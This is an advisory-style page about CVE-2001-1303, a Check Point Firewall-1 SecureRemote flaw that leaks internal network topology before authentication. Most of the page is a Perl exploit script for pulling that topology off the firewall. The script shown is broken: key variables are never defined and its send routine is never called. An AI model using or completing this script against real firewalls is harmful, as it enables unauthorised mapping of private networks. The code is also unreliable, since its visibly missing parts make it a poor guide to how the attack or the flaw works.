Check Point Firewall-1 4 Securemote - Network Information Leak

Related Vulnerabilities: CVE-2001-1303  
Publish Date: 17 Jul 2001

SecureRemote is the proprietary VPN infrastructure designed by Check Point Software, and included with some versions of Firewall-1.

A problem with the package allows remote users to gain information about internal networks. Older versions of the package send network topology information to SecureRemote connections prior to authentication, allowing an information gathering attack. 

# A Command-line tool that can be used to download network Topology
# from Firewall-1's running SecureRemote, with the option "Allow un
# authenticated cleartext topology downloads".
# Usage IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# -

use Socket;
if ($#ARGV<0) {die "Usage: IP\n";}

print "Testing $host on port $port\n";

$SENDY = pack("H*",$SENDY);


if ($#results == 0) {
 print "No results on port 256 - trying 264\n";
 if ($#results2 == 0) {die "Sorry - no results\n";}
} else {print @results;}

sub sendraw {
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in;
  select(S);      $|=1;   print $pstr;
  while(<S>){ push @in, $_;}
  select(STDOUT); close(S); return @in;
 } else { return ""; }
# Spidermark: sensepostdata fw1